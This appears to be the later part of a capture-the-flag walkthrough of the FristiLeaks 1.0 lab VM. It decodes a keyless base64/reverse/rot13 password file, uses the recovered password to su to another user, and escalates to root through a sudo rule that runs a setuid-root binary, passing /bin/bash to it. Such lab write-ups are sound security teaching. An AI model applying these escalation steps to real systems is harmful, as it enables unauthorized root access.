bash-4.1$ cat cryptpass.py
# Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
bash-4.1$

The script base64-encodes its argument, reverses the string and applies rot13; there is no key, so the steps simply run backwards. In a Python 2 session (rot13 is its own inverse, and because it maps character by character it commutes with the reversal):

>>> import base64
>>> in_string = "=RFn0AKnlMHMPIzpyuTI0ITG"
>>> in_string_1 = in_string[::-1]
>>> in_string_2 = in_string_1.encode("rot13")
>>> print base64.b64decode(in_string_2)
LetThereBeFristi!
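The same decoding in Python 3, added as an example rather than taken from the VM (the str.encode("rot13") used above is Python 2 only; in Python 3 the rot13 codec is reached through codecs.encode/codecs.decode). Because the scheme has no key, anyone holding cryptpass.py can reverse it: this is encoding, not encryption. The decoder also recovers cryptedpass.txt from the same directory, which the walkthrough leaves unread.

```python
import base64
import codecs

# The two "encrypted" strings found in /home/admin on the VM.
WHOISYOURGODNOW = "=RFn0AKnlMHMPIzpyuTI0ITG"
CRYPTEDPASS = "mVGZ3O3omkJLmy2pcuTq"


def fristi_encode(plaintext: str) -> str:
    """Same transform as cryptpass.py: base64, reverse, rot13."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def fristi_decode(token: str) -> str:
    """Undo the steps in reverse order. rot13 is its own inverse, so the
    'undo' of that step is just applying it again; then un-reverse and
    base64-decode. The leading '=' in the token is the base64 padding that
    ended up at the front when the string was reversed."""
    b64 = codecs.decode(token, "rot13")[::-1]
    return base64.b64decode(b64).decode("utf-8")


if __name__ == "__main__":
    for name, token in (("whoisyourgodnow.txt", WHOISYOURGODNOW),
                        ("cryptedpass.txt", CRYPTEDPASS)):
        print(f"{name}: {fristi_decode(token)}")
```

A quick tell that a token came from this scheme is a leading "=" or "==": base64 pads at the end, so reversed base64 pads at the start.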

The file is owned by fristigod and its name asks who your god is, so try the string as fristigod's password with su. Note that fristigod's home is /var/fristigod rather than /home/fristigod. Its .bash_history shows the user repeatedly running a binary called doCom under sudo -u fristi, and the binary turns out to be setuid root.

bash-4.1$ su - fristigod
Password: LetThereBeFristi!
-bash-4.1$ id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
-bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ cd
bash-4.1$ pwd
/var/fristigod
bash-4.1$ ls -la
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff

bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit
bash-4.1$ cd .secret_admin_stuff
bash-4.1$ ls -la
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 ..
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
bash-4.1$ ./doCom
Nice try, but wrong user ;)
bash-4.1$

Run directly as fristigod, the binary refuses us. The history suggests fristigod is allowed to run it via sudo as the user fristi, so check the sudo rules:

bash-4.1$ sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...
bash-4.1$

doCom is setuid root (-rwsr-sr-x root root) and, per its usage line, executes whatever command it is given; its only guard is that the caller must be fristi, which the sudo rule lets us become. Since the binary raises its uid to 0 before running the argument, passing /bin/bash gives a root shell. Note the gid stays at fristi's group, 100(users): only the uid is raised.

bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
[sudo] password for fristigod: LetThereBeFristi!
bash-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
bash-4.1# cd /root
cd /root

bash-4.1# ls
fristileaks_secrets.txt
bash-4.1# cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [
https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
bash-4.1#

Happy Hacking !!!
